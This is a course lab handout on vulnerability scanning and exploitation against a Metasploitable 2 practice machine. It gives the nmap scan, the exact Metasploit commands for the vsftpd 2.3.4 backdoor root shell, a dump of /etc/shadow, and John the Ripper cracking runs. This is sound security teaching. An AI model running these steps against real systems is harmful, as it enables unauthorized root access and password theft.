Tutorial 6

Vulnerability Scanning & Exploitation

 Purpose
On finishing the tutorials, students are expected to:
- Be able to work with different distros of Linux
- Be able to scan & analyze vulnerabilities
- Be able to exploit vulnerabilities
- Be able to crack password hash using different techniques
 Main activities
- Scanning vulnerabilities using Nmap
- Exploit the target using Metasploit
- Crack the password hash using John the Ripper

Lab 6.1. Nmap

Nmap ("Network Mapper") is a free and open source (license) utility for network
discovery and security auditing. Nmap uses raw IP packets in novel ways to
determine what hosts are available on the network, what services (application
name and version) those hosts are offering, what operating systems (and OS
versions) they are running, what type of packet filters/firewalls are in use, and
dozens of other characteristics. It was designed to rapidly scan large networks, but
works fine against single hosts. Nmap runs on all major computer operating
systems, and official binary packages are available for Linux, Windows, and Mac
OS X. In addition to the classic command-line Nmap executable, the Nmap suite
includes an advanced GUI and results viewer (Zenmap), a flexible data transfer,
redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff),
and a packet generation and response analysis tool (Nping).
1. Launch nmap in Kali
Go to Application  2. Vunerability Analysis -> nmap
2. Lauch scan using command nmap –vv –A x.x.x.x
Where x.x.x.x is the IP of Metasploitable machines.
3. After finishing scanning, you may find some vulnerabilities in this site such
as: XSS, FTP anonymous login, VSFTP 2.3.4.

NSE TUTORIAL 6 |Instructor: Nhung Vuong Thi 1

 4. In this tutorial, we will exploit vulnerability of VSFTP 2.3.4 that allows
backdoor.

Lab 6.2. Using the Metasploit Framework

In this lab you will be using MSF to exploit the vsftp 234 backdoor vulnerability.
This vulnerability enables an attacker to remotely execute code without restriction.
This can allow an attacker to have access to the “keys to the kingdom,” the
password hashes, which can later be cracked and then used to gain full access to
the system and network.
Lab Steps
Step 1: Log on to both the Kali and Metasploitable 2 PCs.
To log on to the Kali PC, follow these steps:
1. At the login prompt, type root and press ENTER.
2. At the password prompt, type toor or yourpassword and press ENTER.
To log on Metasploitables 2
1. At the login prompt, type msfadmin and press ENTER.
2. At the password prompt, type msfadmin and press ENTER.
Step 2: Launch Attack at Kali
1. Click the Terminal icon.
2. In the Terminal window, type msfconsole and press ENTER
3. At the msf prompt, type help and press ENTER.
This displays the commands that can be used in the Metasploit console.
a. What command displays modules of a given type?
b. What command allows you to assign a value to a variable?
c. What command selects a module by name?
4. In the Metasploit console, type search vsftpd and press ENTER.
You should see the exploit for the vsftpd vulnerability loaded.

NSE TUTORIAL 6 |Instructor: Nhung Vuong Thi 2

a. What is the exact name of the exploit?
5. In the Metasploit console, type use exploit/unix/ftp/vsftpd_234_backdoor
and press ENTER.
The Metasploit console will display a new prompt with the name of the exploit in
red. If that
does not happen, then you may have typed or pasted the command incorrectly.
6. Type show options and press ENTER.
Note you will need to set the remote host (RHOST), which is the IP address of the
target machine. In this case, it’s Metasploitable. You will set the remote port
(RPORT), which is port 21 for FTP. You will also set the local host (LHOST) or the
Kali machine, which is not listed.
7. At the command prompt, do the following:
a. Type set RHOST 10.0.2.15 press ENTER.
b. Type set RPORT 21 and press ENTER.
c. Type set LHOST 10.0.2.4 and press ENTER.
Next you will deliver a payload. Exploits can have different payloads. To see what
payloads are available for this exploit, do the following:
d. Type show payloads and press ENTER.
There is only one payload available, and it is labeled cmd/unix/interact. This will
allow you to interact with the remote machine without having to log in.
8. In the Metasploit console, type set PAYLOAD cmd/unix/interact and press
ENTER.
Step 3: Run the exploit.
You are now ready to run the exploit.
1. In the Metasploit console, type exploit and press ENTER.
If it worked properly, you will see the following:
[+] Backdoor service has been spawned, handling…
[+] uid=0(root) gid=0(root)
This mean you have a back door into Metasploitable, and you are in as the root
user. Let’s type a few commands and see what we can do.
2. At the prompt, type whoami and press ENTER.
a. Who are you?
3. At the prompt, type pwd and press ENTER.
a. Where are you in the directory structure of Metasploitable?
Let’s grab some password hashes so that we try to crack passwords in a later lab.
4. Type cat /etc/shadow and press ENTER.
5. Copy the content

NSE TUTORIAL 6 |Instructor: Nhung Vuong Thi 3

6. Create a new text document using text editor or nano
7. Name the document MetaHashes.txt and press ENTER.
8. Right-click the text document and select Open With | Leafpad or any text
editor that you had.
9. Paste the text into the text document.
10. Close the document and save the changes.
We have successfully connected to the machine via a back door and infiltrated
the hashes for cracking passwords. You can do just about anything with and to
this machine. You might add users or delete files, clear logs, and so on. For now,
what we have will do.

Lab 6.3: Password Cracking

John the Ripper is a password-cracking tool that is capable of performing a
dictionary, hybrid, or bruteforce attack. There are also versions that can perform
a distributed attack. You will use John the Ripper to attempt to decipher the
passwords from the hashes you captured.
1. In Kali, Click the Terminal icon at the top.
2. At the command prompt, type man john and press ENTER.
This will access the manual for John the Ripper.
a. What is the command to see already cracked passwords?
b. What is the command to restore an interrupted session?
c. Press q to exit the manual.
On the desktop you should have a file called MetaHashes.txt. These are the
hashes for passwords on the Metasploitable machine. It is a dump of the
/etc/shadow file. Let’s view the hashes.
3. In a Terminal window, type nano /root/Desktop/MetaHashes.txt and press
ENTER.
a. How many password hashes do you see in the list? (Don’t the usernames with
*; use only the ones that have the long hash values.)
4. Press CTRL-X to exit nano.
5. Type john –test >/root/Desktop/johntest.txt and press ENTER.
This command sends the output to a text file so you can view it later. It will take a
few minutes to complete. When it is done, right-click the file on the desktop and
open it with Leafpad. This will allow you to scroll up and down. The output will
show you the number of crypts per second (c/s).
a. How many raw crypts per second will your machine do for FreeBSD MD5? Be

NSE TUTORIAL 6 |Instructor: Nhung Vuong Thi 4

sure to multiply the number by the K, which represents the number 1,024.
6. Close Leafpad.
Now you will run John the Ripper with just the password file. The password file is
in the /usr/share/john directory. Take a look at the password file that comes with
John the Ripper. The command less will show you the contents of a file one page
at a time. You can use the SPACEBAR or the cursor keys to move forward through
the file.
7. At the command line, type cd /usr/share/john and press ENTER.
8. At the command line, type less password.lst and press ENTER.
a. Look through the list.
b. Do you see any passwords that are on the Linux server?
c. Do you see any passwords that you have used before on other computers?
9. To close the less utility, type q.
10. To use only the dictionary to attack the hashes, type the following:
john --wordlist=password.lst /root/Desktop/MetaHashes.txt
a. How many password hashes were loaded?
b. What type of hash did it detect? (It should be one of the hashing methods
listed in the test done earlier.)
c. How many passwords did it find?
d. How long did it take?
Now try a hybrid attack and see what you find. To do that, you need to add the –
rules option.
You first have to delete the john.pot file. That file contains the passwords found.
11. At the command line, type rm /root/.john/john.pot and press ENTER.
Note that the discovered passwords go into a hidden directory, .john, in the /root
folder (If nothing means no secret password is stored in that directory, non-
existing folder!)
12. Type john –wordlist:password.lst –rules /root/Desktop/MetaHashes.txt
and press ENTER.
a. How many passwords did it find?
b. How long did it take?
Now you will launch a combination attack. You will do a dictionary, hybrid, and
brute-force attack. This is John the Ripper’s default attack, so you will use no
switches.
13. At the command line, type rm /root/.john/john.pot and press ENTER.
14. Type john /root/Desktop/MetaHashes.txt and press ENTER. While John the
Ripper is running, you can press ENTER, and John the Ripper will report how

NSE TUTORIAL 6 |Instructor: Nhung Vuong Thi 5

many guesses, how much time has passed since it started, and the number of
crypts per second. It will also show where it is in the brute-force process. Let John
the Ripper run for about ten minutes to see whether it finds any more passwords.
a. To see how long John the Ripper has been running and the calculations per
second it has processed, press ENTER.
b. How many passwords did John the Ripper find at the end of ten minutes?
15. To stop John the Ripper, press ctrl-c.
16. Open terminal and try to telnet the victim: telnet 10.0.2.7
Enter msfadmin as username with password msfadmin.
17. Now you are logged in as legitimate user.

NSE TUTORIAL 6 |Instructor: Nhung Vuong Thi 6